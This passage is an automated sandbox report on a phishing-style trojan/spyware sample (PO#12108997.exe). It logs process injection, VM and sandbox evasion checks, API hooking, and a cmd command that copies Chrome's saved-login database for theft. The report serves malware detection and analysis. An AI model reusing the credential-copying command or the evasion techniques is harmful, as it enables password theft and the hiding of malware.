Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A50 NtCreateFile,LdrInitializeThunk, 17_2_04A99A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A995F0 NtQueryInformationFile, 17_2_04A995F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99520 NtWaitForSingleObject, 17_2_04A99520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9AD30 NtSetContextThread, 17_2_04A9AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99670 NtQueryInformationProcess, 17_2_04A99670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A997A0 NtUnmapViewOfSection, 17_2_04A997A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99730 NtQueryVirtualMemory, 17_2_04A99730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9A710 NtOpenProcessToken, 17_2_04A9A710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99760 NtOpenProcess, 17_2_04A99760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9A770 NtOpenThread, 17_2_04A9A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A998A0 NtWriteVirtualMemory, 17_2_04A998A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A998F0 NtReadVirtualMemory, 17_2_04A998F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99820 NtEnumerateKey, 17_2_04A99820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9B040 NtSuspendThread, 17_2_04A9B040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A999D0 NtCreateProcessEx, 17_2_04A999D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99950 NtQueueApcThread, 17_2_04A99950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A80 NtOpenDirectoryObject, 17_2_04A99A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A20 NtResumeThread, 17_2_04A99A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A00 NtProtectVirtualMemory, 17_2_04A99A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A10 NtQuerySection, 17_2_04A99A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9A3B0 NtGetContextThread, 17_2_04A9A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99B00 NtSetValueKey, 17_2_04A99B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA360 NtCreateFile, 17_2_007DA360
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA410 NtReadFile, 17_2_007DA410
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA490 NtClose, 17_2_007DA490
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA540 NtAllocateVirtualMemory, 17_2_007DA540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA35A NtCreateFile,NtReadFile, 17_2_007DA35A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA3B2 NtCreateFile, 17_2_007DA3B2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA40A NtReadFile, 17_2_007DA40A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA5BA NtAllocateVirtualMemory, 17_2_007DA5BA
Source: PO#12108997.exe Binary or memory string: OriginalFilename vs PO#12108997.exe
Source: PO#12108997.exe, 00000000.00000002.270009713.000000000180A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO#12108997.exe
Source: PO#12108997.exe, 00000000.00000000.236724294.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameActivityCont.exe6 vs PO#12108997.exe
Source: PO#12108997.exe, 00000000.00000002.276802246.0000000007E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs PO#12108997.exe
Source: PO#12108997.exe, 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs PO#12108997.exe
Source: PO#12108997.exe Binary or memory string: OriginalFilenameActivityCont.exe6 vs PO#12108997.exe
Source: PO#12108997.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: PO#12108997.exe Virustotal: Detection: 34%
Source: PO#12108997.exe ReversingLabs: Detection: 61%
Source: C:\Users\user\Desktop\PO#12108997.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\PO#12108997.exe "C:\Users\user\Desktop\PO#12108997.exe"
Source: C:\Users\user\Desktop\PO#12108997.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmmon32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Users\user\Desktop\PO#12108997.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO#12108997.exe.log
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\DB1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/6@2/2
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini
Source: C:\Users\user\Desktop\PO#12108997.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_01
Source: C:\Windows\SysWOW64\cmmon32.exe File written: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini
Source: PO#12108997.exe, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\PO#12108997.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: PO#12108997.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO#12108997.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: PO#12108997.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ActivityCont.pdb source: PO#12108997.exe
Source: Binary string: cmmon32.pdb source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ActivityCont.pdbh source: PO#12108997.exe
Source: Binary string: cmmon32.pdbGCTL source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vbc.pdb source: cmmon32.exe, 00000011.00000002.502692331.0000000004705000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: PO#12108997.exe, rI/hS.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_092D3E12 push ecx; ret 0_2_092D3E19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00417095 push cs; ret 4_2_004171E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00416B77 push ss; iretd 4_2_00416B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D4C5 push eax; ret 4_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00417CD7 pushfd ; retf 4_2_00417D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D57C push eax; ret 4_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D512 push eax; ret 4_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D51B push eax; ret 4_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055CD0D1 push ecx; ret 4_2_055CD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AAD0D1 push ecx; ret 17_2_04AAD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007D7095 push cs; ret 17_2_007D71E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD9BC push ds; retf 17_2_007DD9BD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007D7CD7 pushfd ; retf 17_2_007D7D00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD4C5 push eax; ret 17_2_007DD518
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD57C push eax; ret 17_2_007DD582
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD51B push eax; ret 17_2_007DD582
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD512 push eax; ret 17_2_007DD518
Source: initial sample Static PE information: section name: .text entropy: 7.74619611944

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PO#12108997.exe PID: 6956, type: MEMORYSTR
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000007C9904 second address: 00000000007C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000007C9B7E second address: 00000000007C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO#12108997.exe TID: 6960 Thread sleep time: -45733s >= -30000s
Source: C:\Users\user\Desktop\PO#12108997.exe TID: 6984 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 612 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00409AB0 rdtsc 4_2_00409AB0
Source: C:\Users\user\Desktop\PO#12108997.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe API coverage: 7.6 %
Source: C:\Windows\SysWOW64\cmmon32.exe API coverage: 8.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Thread delayed: delay time: 45733
Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.340315869.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000005.00000000.308634959.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.279805713.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.294463797.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05597D50 mov eax, dword ptr fs:[00000030h] 4_2_05597D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B3D43 mov eax, dword ptr fs:[00000030h] 4_2_055B3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F3540 mov eax, dword ptr fs:[00000030h] 4_2_055F3540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05623D40 mov eax, dword ptr fs:[00000030h] 4_2_05623D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559C577 mov eax, dword ptr fs:[00000030h] 4_2_0559C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648D34 mov eax, dword ptr fs:[00000030h] 4_2_05648D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563E539 mov eax, dword ptr fs:[00000030h] 4_2_0563E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4D3B mov eax, dword ptr fs:[00000030h] 4_2_055A4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557AD30 mov eax, dword ptr fs:[00000030h] 4_2_0557AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055FA537 mov eax, dword ptr fs:[00000030h] 4_2_055FA537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0563FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05628DF1 mov eax, dword ptr fs:[00000030h] 4_2_05628DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h] 4_2_055F6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6DC9 mov ecx, dword ptr fs:[00000030h] 4_2_055F6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558D5E0 mov eax, dword ptr fs:[00000030h] 4_2_0558D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AFD9B mov eax, dword ptr fs:[00000030h] 4_2_055AFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056405AC mov eax, dword ptr fs:[00000030h] 4_2_056405AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h] 4_2_055A2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h] 4_2_05572D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A1DB5 mov eax, dword ptr fs:[00000030h] 4_2_055A1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A35A1 mov eax, dword ptr fs:[00000030h] 4_2_055A35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA44B mov eax, dword ptr fs:[00000030h] 4_2_055AA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560C450 mov eax, dword ptr fs:[00000030h] 4_2_0560C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559746D mov eax, dword ptr fs:[00000030h] 4_2_0559746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h] 4_2_055F6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564740D mov eax, dword ptr fs:[00000030h] 4_2_0564740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055ABC2C mov eax, dword ptr fs:[00000030h] 4_2_055ABC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056314FB mov eax, dword ptr fs:[00000030h] 4_2_056314FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h] 4_2_055F6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648CD6 mov eax, dword ptr fs:[00000030h] 4_2_05648CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558849B mov eax, dword ptr fs:[00000030h] 4_2_0558849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648F6A mov eax, dword ptr fs:[00000030h] 4_2_05648F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558EF40 mov eax, dword ptr fs:[00000030h] 4_2_0558EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558FF60 mov eax, dword ptr fs:[00000030h] 4_2_0558FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559F716 mov eax, dword ptr fs:[00000030h] 4_2_0559F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA70E mov eax, dword ptr fs:[00000030h] 4_2_055AA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B73D mov eax, dword ptr fs:[00000030h] 4_2_0559B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564070D mov eax, dword ptr fs:[00000030h] 4_2_0564070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AE730 mov eax, dword ptr fs:[00000030h] 4_2_055AE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560FF10 mov eax, dword ptr fs:[00000030h] 4_2_0560FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05574F2E mov eax, dword ptr fs:[00000030h] 4_2_05574F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B37F5 mov eax, dword ptr fs:[00000030h] 4_2_055B37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h] 4_2_055F7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05588794 mov eax, dword ptr fs:[00000030h] 4_2_05588794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h] 4_2_05587E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563AE44 mov eax, dword ptr fs:[00000030h] 4_2_0563AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h] 4_2_0559AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558766D mov eax, dword ptr fs:[00000030h] 4_2_0558766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA61C mov eax, dword ptr fs:[00000030h] 4_2_055AA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h] 4_2_0557C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A8E00 mov eax, dword ptr fs:[00000030h] 4_2_055A8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562FE3F mov eax, dword ptr fs:[00000030h] 4_2_0562FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631608 mov eax, dword ptr fs:[00000030h] 4_2_05631608
